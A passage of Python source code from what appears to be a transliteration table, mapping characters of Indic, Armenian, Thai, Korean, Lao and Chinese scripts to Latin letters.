self.trans[char] = u\"khn\"\n self.trans['त'] = 'tn'\n for char in u\"द्\":\n self.trans[char] = u\"dn\"\n self.trans['श'] = 'cn'\n for char in u\"ह्\":\n self.trans[char] = u\"fn\"\n for char in u\"अँ\":\n self.trans[char] = u\"m\"\n for char in u\"॒॑\":\n self.trans[char] = u\"\"\n self.trans['०'] = '0'\n self.trans['१'] = '1'\n self.trans['२'] = '2'\n self.trans['३'] = '3'\n self.trans['४'] = '4'\n self.trans['५'] = '5'\n self.trans['६'] = '6'\n self.trans['७'] = '7'\n self.trans['८'] = '8'\n self.trans['९'] = '9'\n\n # Armenian\n self.trans['Ա'] = 'A'\n self.trans['ա'] = 'a'\n self.trans['Բ'] = 'B'\n self.trans['բ'] = 'b'\n self.trans['Գ'] = 'G'\n self.trans['գ'] = 'g'\n self.trans['Դ'] = 'D'\n self.trans['դ'] = 'd'\n self.trans['Ե'] = 'Je'\n self.trans['ե'] = 'e'\n self.trans['Զ'] = 'Z'\n self.trans['զ'] = 'z'\n self.trans['Է'] = 'É'\n self.trans['է'] = 'é'\n self.trans['Ը'] = 'Ë'\n self.trans['ը'] = 'ë'\n self.trans['Թ'] = 'Th'\n self.trans['թ'] = 'th'\n self.trans['Ժ'] = 'Zh'\n self.trans['ժ'] = 'zh'\n self.trans['Ի'] = 'I'\n self.trans['ի'] = 'i'\n self.trans['Լ'] = 'L'\n self.trans['լ'] = 'l'\n self.trans['Խ'] = 'Ch'\n self.trans['խ'] = 'ch'\n self.trans['Ծ'] = 'Ts'\n self.trans['ծ'] = 'ts'\n self.trans['Կ'] = 'K'\n self.trans['կ'] = 'k'\n self.trans['Հ'] = 'H'\n self.trans['հ'] = 'h'\n self.trans['Ձ'] = 'Dz'\n self.trans['ձ'] = 'dz'\n self.trans['Ղ'] = 'R'\n self.trans['ղ'] = 'r'\n self.trans['Ճ'] = 'Cz'\n self.trans['ճ'] = 'cz'\n self.trans['Մ'] = 'M'\n self.trans['մ'] = 'm'\n self.trans['Յ'] = 'J'\n self.trans['յ'] = 'j'\n self.trans['Ն'] = 'N'\n self.trans['ն'] = 'n'\n self.trans['Շ'] = 'S'\n self.trans['շ'] = 's'\n self.trans['Շ'] = 'Vo'\n self.trans['շ'] = 'o'\n self.trans['Չ'] = 'Tsh'\n self.trans['չ'] = 'tsh'\n self.trans['Պ'] = 'P'\n self.trans['պ'] = 'p'\n self.trans['Ջ'] = 'Dz'\n self.trans['ջ'] = 'dz'\n self.trans['Ռ'] = 'R'\n self.trans['ռ'] = 'r'\n self.trans['Ս'] = 'S'\n self.trans['ս'] = 's'\n self.trans['Վ'] = 'V'\n self.trans['վ'] = 'v'\n for char in u\"Տ\":\n self.trans[char] = u\"T'\"\n for char in u\"տ\":\n self.trans[char] = u\"t'\"\n self.trans['Ր'] = 'R'\n self.trans['ր'] = 'r'\n self.trans['Ց'] = 'Tsh'\n self.trans['ց'] = 'tsh'\n self.trans['Ւ'] = 'V'\n self.trans['ւ'] = 'v'\n self.trans['Փ'] = 'Ph'\n self.trans['փ'] = 'ph'\n self.trans['Ք'] = 'Kh'\n self.trans['ք'] = 'kh'\n self.trans['Օ'] = 'O'\n self.trans['օ'] = 'o'\n self.trans['Ֆ'] = 'F'\n self.trans['ֆ'] = 'f'\n self.trans['և'] = '&'\n self.trans['՟'] = '.'\n self.trans['՞'] = '?'\n self.trans['՝'] = ';'\n self.trans['՛'] = ''\n\n # Tamil\n for char in u\"க்\":\n self.trans[char] = u\"k\"\n for char in u\"ஙண்ந்ன்\":\n self.trans[char] = u\"n\"\n self.trans['ச'] = 'c'\n for char in u\"ஞ்\":\n self.trans[char] = u\"ñ\"\n for char in u\"ட்\":\n self.trans[char] = u\"th\"\n self.trans['த'] = 't'\n self.trans['ப'] = 'p'\n for char in u\"ம்\":\n self.trans[char] = u\"m\"\n for char in u\"ய்\":\n self.trans[char] = u\"y\"\n for char in u\"ர்ழ்ற\":\n self.trans[char] = u\"r\"\n for char in u\"ல்ள\":\n self.trans[char] = u\"l\"\n for char in u\"வ்\":\n self.trans[char] = u\"v\"\n self.trans['ஜ'] = 'j'\n self.trans['ஷ'] = 'sh'\n self.trans['ஸ'] = 's'\n self.trans['ஹ'] = 'h'\n for char in u\"க்ஷ\":\n self.trans[char] = u\"x\"\n self.trans['அ'] = 'a'\n self.trans['ஆ'] = 'aa'\n self.trans['இ'] = 'i'\n self.trans['ஈ'] = 'ii'\n self.trans['உ'] = 'u'\n self.trans['ஊ'] = 'uu'\n self.trans['எ'] = 'e'\n self.trans['ஏ'] = 'ee'\n self.trans['ஐ'] = 'ai'\n self.trans['ஒ'] = 'o'\n self.trans['ஓ'] = 'oo'\n self.trans['ஔ'] = 'au'\n self.trans['ஃ'] = ''\n\n # Bengali\n self.trans['অ'] = 'ô'\n for char in u\"আা\":\n self.trans[char] = u\"a\"\n for char in u\"ইিঈী\":\n self.trans[char] = u\"i\"\n for char in u\"উুঊূ\":\n self.trans[char] = u\"u\"\n for char in u\"ঋৃ\":\n self.trans[char] = u\"ri\"\n for char in u\"এেয়\":\n self.trans[char] = u\"e\"\n for char in u\"ঐৈ\":\n self.trans[char] = u\"oi\"\n for char in u\"ওো\":\n self.trans[char] = u\"o\"\n for char in u\"ঔৌ\":\n self.trans[char] = \"ou\"\n self.trans['্'] = ''\n self.trans['ৎ'] = 't'\n self.trans['ং'] = 'n'\n self.trans['ঃ'] = 'h'\n self.trans['ঁ'] = 'ñ'\n self.trans['ক'] = 'k'\n self.trans['খ'] = 'kh'\n self.trans['গ'] = 'g'\n self.trans['ঘ'] = 'gh'\n self.trans['ঙ'] = 'ng'\n self.trans['চ'] = 'ch'\n self.trans['ছ'] = 'chh'\n self.trans['জ'] = 'j'\n self.trans['ঝ'] = 'jh'\n self.trans['ঞ'] = 'n'\n for char in u\"টত\":\n self.trans[char] = u\"t\"\n for char in u\"ঠথ\":\n self.trans[char] = u\"th\"\n for char in u\"ডদ\":\n self.trans[char] = u\"d\"\n for char in u\"ঢধ\":\n self.trans[char] = u\"dh\"\n for char in u\"ণন\":\n self.trans[char] = u\"n\"\n self.trans['প'] = 'p'\n self.trans['ফ'] = 'ph'\n self.trans['ব'] = 'b'\n self.trans['ভ'] = 'bh'\n self.trans['ম'] = 'm'\n self.trans['য'] = 'dzh'\n self.trans['র'] = 'r'\n self.trans['ল'] = 'l'\n self.trans['শ'] = 's'\n self.trans['হ'] = 'h'\n for char in u\"য়\":\n self.trans[char] = u\"-\"\n for char in u\"ড়\":\n self.trans[char] = u\"r\"\n self.trans['ঢ'] = 'rh'\n self.trans['০'] = '0'\n self.trans['১'] = '1'\n self.trans['২'] = '2'\n self.trans['৩'] = '3'\n self.trans['৪'] = '4'\n self.trans['৫'] = '5'\n self.trans['৬'] = '6'\n self.trans['৭'] = '7'\n self.trans['৮'] = '8'\n self.trans['৯'] = '9'\n\n # Thai (because of complications of the alphabet, self.transliterations\n # are very imprecise here)\n self.trans['ก'] = 'k'\n for char in u\"ขฃคฅฆ\":\n self.trans[char] = u\"kh\"\n self.trans['ง'] = 'ng'\n for char in u\"จฉชฌ\":\n self.trans[char] = u\"ch\"\n for char in u\"ซศษส\":\n self.trans[char] = u\"s\"\n for char in u\"ญย\":\n self.trans[char] = u\"y\"\n for char in u\"ฎด\":\n self.trans[char] = u\"d\"\n for char in u\"ฏต\":\n self.trans[char] = u\"t\"\n for char in u\"ฐฑฒถทธ\":\n self.trans[char] = u\"th\"\n for char in u\"ณน\":\n self.trans[char] = u\"n\"\n self.trans['บ'] = 'b'\n self.trans['ป'] = 'p'\n for char in u\"ผพภ\":\n self.trans[char] = u\"ph\"\n for char in u\"ฝฟ\":\n self.trans[char] = u\"f\"\n self.trans['ม'] = 'm'\n self.trans['ร'] = 'r'\n self.trans['ฤ'] = 'rue'\n self.trans['ๅ'] = ':'\n for char in u\"ลฬ\":\n self.trans[char] = u\"l\"\n self.trans['ฦ'] = 'lue'\n self.trans['ว'] = 'w'\n for char in u\"หฮ\":\n self.trans[char] = u\"h\"\n self.trans['อ'] = ''\n self.trans['ร'] = 'ü'\n self.trans['ว'] = 'ua'\n for char in u\"อวโิ\":\n self.trans[char] = u\"o\"\n for char in u\"ะัา\":\n self.trans[char] = u\"a\"\n self.trans['ว'] = 'u'\n self.trans['ำ'] = 'am'\n self.trans['ิ'] = 'i'\n self.trans['ี'] = 'i:'\n self.trans['ึ'] = 'ue'\n self.trans['ื'] = 'ue:'\n self.trans['ุ'] = 'u'\n self.trans['ู'] = 'u:'\n for char in u\"เ็\":\n self.trans[char] = u\"e\"\n self.trans['แ'] = 'ae'\n for char in u\"ใไ\":\n self.trans[char] = u\"ai\"\n for char in u\"่้๊๋็์\":\n self.trans[char] = u\"\"\n self.trans['ฯ'] = '.'\n self.trans['ๆ'] = '(2)'\n\n # Korean (Revised Romanization system within possible, incomplete)\n self.trans['국'] = 'guk'\n self.trans['명'] = 'myeong'\n self.trans['검'] = 'geom'\n self.trans['타'] = 'ta'\n self.trans['분'] = 'bun'\n self.trans['사'] = 'sa'\n self.trans['류'] = 'ryu'\n self.trans['포'] = 'po'\n self.trans['르'] = 'reu'\n self.trans['투'] = 'tu'\n self.trans['갈'] = 'gal'\n self.trans['어'] = 'eo'\n self.trans['노'] = 'no'\n self.trans['웨'] = 'we'\n self.trans['이'] = 'i'\n self.trans['라'] = 'ra'\n self.trans['틴'] = 'tin'\n self.trans['루'] = 'ru'\n self.trans['마'] = 'ma'\n self.trans['니'] = 'ni'\n self.trans['아'] = 'a'\n self.trans['독'] = 'dok'\n self.trans['일'] = 'il'\n self.trans['모'] = 'mo'\n self.trans['크'] = 'keu'\n self.trans['샤'] = 'sya'\n self.trans['영'] = 'yeong'\n self.trans['불'] = 'bul'\n self.trans['가'] = 'ga'\n self.trans['리'] = 'ri'\n self.trans['그'] = 'geu'\n self.trans['지'] = 'ji'\n self.trans['야'] = 'ya'\n self.trans['바'] = 'ba'\n self.trans['슈'] = 'syu'\n self.trans['키'] = 'ki'\n self.trans['프'] = 'peu'\n self.trans['랑'] = 'rang'\n self.trans['스'] = 'seu'\n self.trans['로'] = 'ro'\n self.trans['메'] = 'me'\n self.trans['역'] = 'yeok'\n self.trans['도'] = 'do'\n\n # Kannada\n self.trans[u\"ಅ\"] = u\"a\"\n for char in u\"ಆಾ\":\n self.trans[char] = u\"aa\"\n for char in u\"ಇಿ\":\n self.trans[char] = u\"i\"\n for char in u\"ಈೀ\":\n self.trans[char] = u\"ii\"\n for char in u\"ಉು\":\n self.trans[char] = u\"u\"\n for char in u\"ಊೂ\":\n self.trans[char] = u\"uu\"\n for char in u\"ಋೂ\":\n self.trans[char] = u\"r'\"\n for char in u\"ಎೆ\":\n self.trans[char] = u\"e\"\n for char in u\"ಏೇ\":\n self.trans[char] = u\"ee\"\n for char in u\"ಐೈ\":\n self.trans[char] = u\"ai\"\n for char in u\"ಒೊ\":\n self.trans[char] = u\"o\"\n for char in u\"ಓೋ\":\n self.trans[char] = u\"oo\"\n for char in u\"ಔೌ\":\n self.trans[char] = u\"au\"\n self.trans[u\"ಂ\"] = u\"m'\"\n self.trans[u\"ಃ\"] = u\"h'\"\n self.trans[u\"ಕ\"] = u\"k\"\n self.trans[u\"ಖ\"] = u\"kh\"\n self.trans[u\"ಗ\"] = u\"g\"\n self.trans[u\"ಘ\"] = u\"gh\"\n self.trans[u\"ಙ\"] = u\"ng\"\n self.trans[u\"ಚ\"] = u\"c\"\n self.trans[u\"ಛ\"] = u\"ch\"\n self.trans[u\"ಜ\"] = u\"j\"\n self.trans[u\"ಝ\"] = u\"ny\"\n self.trans[u\"ಟ\"] = u\"tt\"\n self.trans[u\"ಠ\"] = u\"tth\"\n self.trans[u\"ಡ\"] = u\"dd\"\n self.trans[u\"ಢ\"] = u\"ddh\"\n self.trans[u\"ಣ\"] = u\"nn\"\n self.trans[u\"ತ\"] = u\"t\"\n self.trans[u\"ಥ\"] = u\"th\"\n self.trans[u\"ದ\"] = u\"d\"\n self.trans[u\"ಧ\"] = u\"dh\"\n self.trans[u\"ನ\"] = u\"n\"\n self.trans[u\"ಪ\"] = u\"p\"\n self.trans[u\"ಫ\"] = u\"ph\"\n self.trans[u\"ಬ\"] = u\"b\"\n self.trans[u\"ಭ\"] = u\"bh\"\n self.trans[u\"ಮ\"] = u\"m\"\n self.trans[u\"ಯ\"] = u\"y\"\n self.trans[u\"ರ\"] = u\"r\"\n self.trans[u\"ಲ\"] = u\"l\"\n self.trans[u\"ವ\"] = u\"v\"\n self.trans[u\"ಶ\"] = u\"sh\"\n self.trans[u\"ಷ\"] = u\"ss\"\n self.trans[u\"ಸ\"] = u\"s\"\n self.trans[u\"ಹ\"] = u\"h\"\n self.trans[u\"ಳ\"] = u\"ll\"\n self.trans[u\"೦\"] = u\"0\"\n self.trans[u\"೧\"] = u\"1\"\n self.trans[u\"೨\"] = u\"2\"\n self.trans[u\"೩\"] = u\"3\"\n self.trans[u\"೪\"] = u\"4\"\n self.trans[u\"೫\"] = u\"5\"\n self.trans[u\"೬\"] = u\"6\"\n self.trans[u\"೭\"] = u\"7\"\n self.trans[u\"೮\"] = u\"8\"\n self.trans[u\"೯\"] = u\"9\"\n # Telugu\n self.trans['అ'] = 'a'\n for char in u\"ఆా\":\n self.trans[char] = u\"aa\"\n for char in u\"ఇి\":\n self.trans[char] = u\"i\"\n for char in u\"ఈీ\":\n self.trans[char] = u\"ii\"\n for char in u\"ఉు\":\n self.trans[char] = u\"u\"\n for char in u\"ఊూ\":\n self.trans[char] = u\"uu\"\n for char in u\"ఋృ\":\n self.trans[char] = u\"r'\"\n for char in u\"ౠౄ\":\n self.trans[char] = u'r\"'\n self.trans[u\"ఌ\"] = u\"l'\"\n self.trans[u\"ౡ\"] = u'l\"'\n for char in u\"ఎె\":\n self.trans[char] = u\"e\"\n for char in u\"ఏే\":\n self.trans[char] = u\"ee\"\n for char in u\"ఐై\":\n self.trans[char] = u\"ai\"\n for char in u\"ఒొ\":\n self.trans[char] = u\"o\"\n for char in u\"ఓో\":\n self.trans[char] = u\"oo\"\n for char in u\"ఔౌ\":\n self.trans[char] = u\"au\"\n self.trans[u\"ం\"] = u\"'\"\n self.trans[u\"ః\"] = u'\"'\n self.trans[u\"క\"] = u\"k\"\n self.trans[u\"ఖ\"] = u\"kh\"\n self.trans[u\"గ\"] = u\"g\"\n self.trans[u\"ఘ\"] = u\"gh\"\n self.trans[u\"ఙ\"] = u\"ng\"\n self.trans[u\"చ\"] = u\"ts\"\n self.trans[u\"ఛ\"] = u\"tsh\"\n self.trans[u\"జ\"] = u\"j\"\n self.trans[u\"ఝ\"] = u\"jh\"\n self.trans[u\"ఞ\"] = u\"ñ\"\n for char in u\"టత\":\n self.trans[char] = u\"t\"\n for char in u\"ఠథ\":\n self.trans[char] = u\"th\"\n for char in u\"డద\":\n self.trans[char] = u\"d\"\n for char in u\"ఢధ\":\n self.trans[char] = u\"dh\"\n for char in u\"ణన\":\n self.trans[char] = u\"n\"\n self.trans[u\"ప\"] = u\"p\"\n self.trans[u\"ఫ\"] = u\"ph\"\n self.trans[u\"బ\"] = u\"b\"\n self.trans[u\"భ\"] = u\"bh\"\n self.trans[u\"మ\"] = u\"m\"\n self.trans[u\"య\"] = u\"y\"\n for char in u\"రఱ\":\n self.trans[char] = u\"r\"\n for char in u\"లళ\":\n self.trans[char] = u\"l\"\n self.trans[u\"వ\"] = u\"v\"\n self.trans[u\"శ\"] = u\"sh\"\n for char in u\"షస\":\n self.trans[char] = u\"s\"\n self.trans[u\"హ\"] = u\"h\"\n self.trans[u\"్\"] = \"\"\n for char in u\"ంఁ\":\n self.trans[char] = u\"^\"\n self.trans[u\"ః\"] = u\"-\"\n self.trans[u\"౦\"] = u\"0\"\n self.trans[u\"౧\"] = u\"1\"\n self.trans[u\"౨\"] = u\"2\"\n self.trans[u\"౩\"] = u\"3\"\n self.trans[u\"౪\"] = u\"4\"\n self.trans[u\"౫\"] = u\"5\"\n self.trans[u\"౬\"] = u\"6\"\n self.trans[u\"౭\"] = u\"7\"\n self.trans[u\"౮\"] = u\"8\"\n self.trans[u\"౯\"] = u\"9\"\n self.trans[u\"౹\"] = u\"1/4\"\n self.trans[u\"౺\"] = u\"1/2\"\n self.trans[u\"౻\"] = u\"3/4\"\n self.trans[u\"౼\"] = u\"1/16\"\n self.trans[u\"౽\"] = u\"1/8\"\n self.trans[u\"౾\"] = u\"3/16\"\n # Lao - note: pronounciation in initial position is used;\n # different pronounciation in final position is ignored\n self.trans[u\"ກ\"] = \"k\"\n for char in u\"ຂຄ\":\n self.trans[char] = \"kh\"\n self.trans[u\"ງ\"] = \"ng\"\n self.trans[u\"ຈ\"] = \"ch\"\n for char in u\"ສຊ\":\n self.trans[char] = \"s\"\n self.trans[u\"ຍ\"] = \"ny\"\n self.trans[u\"ດ\"] = \"d\"\n self.trans[u\"ຕ\"] = \"t\"\n for char in u\"ຖທ\":\n self.trans[char] = \"th\"\n self.trans[u\"ນ\"] = \"n\"\n self.trans[u\"ບ\"] = \"b\"\n self.trans[u\"ປ\"] = \"p\"\n for char in u\"ຜພ\":\n self.trans[char] = \"ph\"\n for char in u\"ຝຟ\":\n self.trans[char] = \"f\"\n for char in u\"ມໝ\":\n self.trans[char] = \"m\"\n self.trans[u\"ຢ\"] = \"y\"\n for char in u\"ຣຼ\":\n self.trans[char] = \"r\"\n for char in u\"ລຼ\":\n self.trans[char] = \"l\"\n self.trans[u\"ວ\"] = \"v\"\n self.trans['ຮ'] = 'h'\n self.trans[u\"ອ\"] = \"'\"\n for char in u\"ະັ\":\n self.trans[char] = \"a\"\n self.trans[u\"ິ\"] = \"i\"\n self.trans[u\"ຶ\"] = \"ue\"\n self.trans[u\"ຸ\"] = \"u\"\n self.trans[u\"ເ\"] = u\"é\"\n self.trans[u\"ແ\"] = u\"è\"\n for char in u\"ໂົາໍ\":\n self.trans[char] = \"o\"\n self.trans[u\"ຽ\"] = \"ia\"\n self.trans[u\"ເຶ\"] = \"uea\"\n self.trans[u\"ຍ\"] = \"i\"\n for char in u\"ໄໃ\":\n self.trans[char] = \"ai\"\n self.trans[u\"ຳ\"] = \"am\"\n self.trans[u\"າ\"] = \"aa\"\n self.trans[u\"ີ\"] = \"ii\"\n self.trans[u\"ື\"] = \"yy\"\n self.trans[u\"ູ\"] = \"uu\"\n self.trans[u\"ເ\"] = \"e\"\n self.trans[u\"ແ\"] = \"ei\"\n self.trans[u\"໐\"] = \"0\"\n self.trans[u\"໑\"] = \"1\"\n self.trans[u\"໒\"] = \"2\"\n self.trans[u\"໓\"] = \"3\"\n self.trans[u\"໔\"] = \"4\"\n self.trans[u\"໕\"] = \"5\"\n self.trans[u\"໖\"] = \"6\"\n self.trans[u\"໗\"] = \"7\"\n self.trans[u\"໘\"] = \"8\"\n self.trans[u\"໙\"] = \"9\"\n # Chinese -- note: incomplete\n for char in u\"埃挨哎唉哀皑癌蔼矮艾碍爱隘\":\n self.trans[char] = u\"ai\"\n for char in u\"鞍氨安俺按暗岸胺案\":\n self.trans[char] = u\"an\"\n for char in u\"肮昂盎\":\n self.trans[char] = u\"ang\"\n for char in u\"凹敖熬翱袄傲奥懊澳\":\n self.trans[char] = u\"ao\"\n for char in u\"芭捌扒叭吧笆八疤巴拔跋靶把耙坝霸罢爸\":\n self.trans[char] = u\"ba\"\n for char in u\"白柏百摆佰败拜稗\":\n self.trans[char] = u\"bai\"\n for char in u\"斑班搬扳般颁板版扮拌伴瓣半办绊\":\n self.trans[char] = u\"ban\"\n for char in u\"邦帮梆榜膀绑棒磅蚌镑傍谤\":\n self.trans[char] = u\"bang\"\n for char in u\"苞胞包褒剥薄雹保堡饱宝抱报暴豹鲍爆\":\n self.trans[char] = u\"bao\"\n for char in u\"杯碑悲卑北辈背贝钡倍狈备惫焙被\":\n self.trans[char] = u\"bei\"\n for char in u\"奔苯本笨\":\n self.trans[char] = u\"ben\"\n for char in u\"崩绷甭泵蹦迸\":\n self.trans[char] = u\"beng\"\n for char in u\"逼鼻比鄙笔彼碧蓖蔽毕毙毖币庇痹闭敝弊必辟壁臂避陛\":\n self.trans[char] = u\"bi\"\n for char in u\"鞭边编贬扁便变卞辨辩辫遍\":\n self.trans[char] = u\"bian\"\n for char in u\"标彪膘表\":\n self.trans[char] = u\"biao\"\n for char in u\"鳖憋别瘪\":\n self.trans[char] = u\"bie\"\n for char in u\"彬斌濒滨宾摈\":\n self.trans[char] = u\"bin\"\n for char in u\"兵冰柄丙秉饼炳病并\":\n self.trans[char] = u\"bing\"\n for char in u\"玻菠播拨钵波博勃搏铂箔伯帛舶脖膊渤泊驳捕卜亳\":\n self.trans[char] = u\"bo\"\n for char in u\"哺补埠不布步簿部怖\":\n self.trans[char] = u\"bu\"\n for char in u\"猜裁材才财睬踩采彩菜蔡\":\n self.trans[char] = u\"cai\"\n for char in u\"餐参蚕残惭惨灿\":\n self.trans[char] = u\"can\"\n for char in u\"苍舱仓沧藏\":\n self.trans[char] = u\"cang\"\n for char in u\"操糙槽曹草\":\n self.trans[char] = u\"cao\"\n for char in u\"厕策侧册测\":\n self.trans[char] = u\"ce\"\n for char in u\"层蹭\":\n self.trans[char] = u\"ceng\"\n for char in u\"插叉茬茶查碴搽察岔差诧\":\n self.trans[char] = u\"cha\"\n for char in u\"拆柴豺\":\n self.trans[char] = u\"chai\"\n for char in u\"搀掺蝉馋谗缠铲产阐颤\":\n self.trans[char] = u\"chan\"\n for char in u\"昌猖场尝常长偿肠厂敞畅唱倡\":\n self.trans[char] = u\"chang\"\n for char in u\"超抄钞朝嘲潮巢吵炒\":\n self.trans[char] = u\"chao\"\n for char in u\"车扯撤掣彻澈\":\n self.trans[char] = u\"che\"\n for char in u\"郴臣辰尘晨忱沉陈趁衬\":\n self.trans[char] = u\"chen\"\n for char in u\"撑称城橙成呈乘程惩澄诚承逞骋秤\":\n self.trans[char] = u\"cheng\"\n for char in u\"吃痴持匙池迟弛驰耻齿侈尺赤翅斥炽\":\n self.trans[char] = u\"chi\"\n for char in u\"充冲虫崇宠\":\n self.trans[char] = u\"chong\"\n for char in u\"抽酬畴踌稠愁筹仇绸瞅丑臭\":\n self.trans[char] = u\"chou\"\n for char in u\"初出橱厨躇锄雏滁除楚储矗搐触处\":\n self.trans[char] = u\"chu\"\n self.trans['揣'] = 'chuai'\n for char in u\"川穿椽传船喘串\":\n self.trans[char] = u\"chuan\"\n for char in u\"疮窗幢床闯创\":\n self.trans[char] = u\"chuang\"\n for char in u\"吹炊捶锤垂\":\n self.trans[char] = u\"chui\"\n for char in u\"春椿醇唇淳纯蠢\":\n self.trans[char] = u\"chun\"\n for char in u\"戳绰\":\n self.trans[char] = u\"chuo\"\n for char in u\"疵茨磁雌辞慈瓷词此刺赐次\":\n self.trans[char] = u\"ci\"\n for char in u\"聪葱囱匆从丛\":\n self.trans[char] = u\"cong\"\n self.trans['凑'] = 'cou'\n for char in u\"粗醋簇促\":\n self.trans[char] = u\"cu\"\n for char in u\"蹿篡窜\":\n self.trans[char] = u\"cuan\"\n for char in u\"摧崔催脆瘁粹淬翠\":\n self.trans[char] = u\"cui\"\n for char in u\"村存寸\":\n self.trans[char] = u\"cun\"\n for char in u\"磋撮搓措挫错\":\n self.trans[char] = u\"cuo\"\n for char in u\"搭达答瘩打大\":\n self.trans[char] = u\"da\"\n for char in u\"呆歹傣戴带殆代贷袋待逮怠\":\n self.trans[char] = u\"dai\"\n for char in u\"耽担丹单郸掸胆旦氮但惮淡诞弹蛋儋\":\n self.trans[char] = u\"dan\"\n for char in u\"当挡党荡档\":\n self.trans[char] = u\"dang\"\n for char in u\"刀捣蹈倒岛祷导到稻悼道盗\":\n self.trans[char] = u\"dao\"\n for char in u\"德得的\":\n self.trans[char] = u\"de\"\n for char in u\"蹬灯登等瞪凳邓\":\n self.trans[char] = u\"deng\"\n for char in u\"堤低滴迪敌笛狄涤翟嫡抵底地蒂第帝弟递缔\":\n self.trans[char] = u\"di\"\n for char in u\"颠掂滇碘点典靛垫电佃甸店惦奠淀殿\":\n self.trans[char] = u\"dian\"\n for char in u\"碉叼雕凋刁掉吊钓调\":\n self.trans[char] = u\"diao\"\n for char in u\"跌爹碟蝶迭谍叠\":\n self.trans[char] = u\"die\"\n for char in u\"丁盯叮钉顶鼎锭定订\":\n self.trans[char] = u\"ding\"\n self.trans['丢'] = 'diu'\n for char in u\"东冬董懂动栋侗恫冻洞\":\n self.trans[char] = u\"dong\"\n for char in u\"兜抖斗陡豆逗痘\":\n self.trans[char] = u\"dou\"\n for char in u\"都督毒犊独读堵睹赌杜镀肚度渡妒\":\n self.trans[char] = u\"du\"\n for char in u\"端短锻段断缎\":\n self.trans[char] = u\"duan\"\n for char in u\"堆兑队对\":\n self.trans[char] = u\"dui\"\n for char in u\"墩吨蹲敦顿囤钝盾遁\":\n self.trans[char] = u\"dun\"\n for char in u\"掇哆多夺垛躲朵跺舵剁惰堕\":\n self.trans[char] = u\"duo\"\n for char in u\"蛾峨鹅俄额讹娥恶厄扼遏鄂饿\":\n self.trans[char] = u\"e\"\n for char in u\"恩嗯\":\n self.trans[char] = u\"en\"\n for char in u\"而儿耳尔饵洱二贰\":\n self.trans[char] = u\"er\"\n for char in u\"发罚筏伐乏阀法珐\":\n self.trans[char] = u\"fa\"\n for char in u\"藩帆番翻樊矾钒繁凡烦反返范贩犯饭泛\":\n self.trans[char] = u\"fan\"\n for char in u\"坊芳方肪房防妨仿访纺放\":\n self.trans[char] = u\"fang\"\n for char in u\"菲非啡飞肥匪诽吠肺废沸费\":\n self.trans[char] = u\"fei\"\n for char in u\"芬酚吩氛分纷坟焚汾粉奋份忿愤粪\":\n self.trans[char] = u\"fen\"\n for char in u\"丰封枫蜂峰锋风疯烽逢冯缝讽奉凤\":\n self.trans[char] = u\"feng\"\n self.trans['佛'] = 'fo'\n self.trans['否'] = 'fou'\n for char in u\"夫敷肤孵扶拂辐幅氟符伏俘服浮涪福袱弗甫抚辅俯釜斧脯腑府腐赴副覆赋复傅付阜父腹负富讣附妇缚咐\":\n self.trans[char] = u\"fu\"\n for char in u\"噶嘎\":\n self.trans[char] = u\"ga\"\n for char in u\"该改概钙盖溉\":\n self.trans[char] = u\"gai\"\n for char in u\"干甘杆柑竿肝赶感秆敢赣\":\n self.trans[char] = u\"gan\"\n for char in u\"冈刚钢缸肛纲岗港杠\":\n self.trans[char] = u\"gang\"\n for char in u\"篙皋高膏羔糕搞镐稿告\":\n self.trans[char] = u\"gao\"\n for char in u\"哥歌搁戈鸽胳疙割革葛格蛤阁隔铬个各\":\n self.trans[char] = u\"ge\"\n self.trans['给'] = 'gei'\n for char in u\"根跟\":\n self.trans[char] = u\"gen\"\n for char in u\"耕更庚羹埂耿梗\":\n self.trans[char] = u\"geng\"\n for char in u\"工攻功恭龚供躬公宫弓巩汞拱贡共\":\n self.trans[char] = u\"gong\"\n for char in u\"钩勾沟苟狗垢构购够\":\n self.trans[char] = u\"gou\"\n for char in u\"辜菇咕箍估沽孤姑鼓古蛊骨谷股故顾固雇\":\n self.trans[char] = u\"gu\"\n for char in u\"刮瓜剐寡挂褂\":\n self.trans[char] = u\"gua\"\n for char in u\"乖拐怪\":\n self.trans[char] = u\"guai\"\n for char in u\"棺关官冠观管馆罐惯灌贯\":\n self.trans[char] = u\"guan\"\n for char in u\"光广逛\":\n self.trans[char] = u\"guang\"\n for char in u\"瑰规圭硅归龟闺轨鬼诡癸桂柜跪贵刽\":\n self.trans[char] = u\"gui\"\n for char in u\"辊滚棍\":\n self.trans[char] = u\"gun\"\n for char in u\"锅郭国果裹过\":\n self.trans[char] = u\"guo\"\n self.trans['哈'] = 'ha'\n for char in u\"骸孩海氦亥害骇\":\n self.trans[char] = u\"hai\"\n for char in u\"酣憨邯韩含涵寒函喊罕翰撼捍旱憾悍焊汗汉\":\n self.trans[char] = u\"han\"\n for char in u\"夯杭航\":\n self.trans[char] = u\"hang\"\n for char in u\"壕嚎豪毫郝好耗号浩\":\n self.trans[char] = u\"hao\"\n for char in u\"呵喝荷菏核禾和何合盒貉阂河涸赫褐鹤贺\":\n self.trans[char] = u\"he\"\n for char in u\"嘿黑\":\n self.trans[char] = u\"hei\"\n for char in u\"痕很狠恨\":\n self.trans[char] = u\"hen\"\n for char in u\"哼亨横衡恒\":\n self.trans[char] = u\"heng\"\n for char in u\"轰哄烘虹鸿洪宏弘红\":\n self.trans[char] = u\"hong\"\n for char in u\"喉侯猴吼厚候后\":\n self.trans[char] = u\"hou\"\n for char in u\"呼乎忽瑚壶葫胡蝴狐糊湖弧虎唬护互沪户\":\n self.trans[char] = u\"hu\"\n for char in u\"花哗华猾滑画划化话\":\n self.trans[char] = u\"hua\"\n for char in u\"槐徊怀淮坏\":\n self.trans[char] = u\"huai\"\n for char in u\"欢环桓还缓换患唤痪豢焕涣宦幻\":\n self.trans[char] = u\"huan\"\n for char in u\"荒慌黄磺蝗簧皇凰惶煌晃幌恍谎\":\n self.trans[char] = u\"huang\"\n for char in u\"灰挥辉徽恢蛔回毁悔慧卉惠晦贿秽会烩汇讳诲绘\":\n self.trans[char] = u\"hui\"\n for char in u\"荤昏婚魂浑混\":\n self.trans[char] = u\"hun\"\n for char in u\"豁活伙火获或惑霍货祸\":\n self.trans[char] = u\"huo\"\n for char in u\"击圾基机畸稽积箕肌饥迹激讥鸡姬绩缉吉极棘辑籍集及急疾汲即嫉级挤几脊己蓟技冀季伎祭剂悸济寄寂计记既忌际妓继纪\":\n self.trans[char] = u\"ji\"\n for char in u\"嘉枷夹佳家加荚颊贾甲钾假稼价架驾嫁\":\n self.trans[char] = u\"jia\"\n for char in 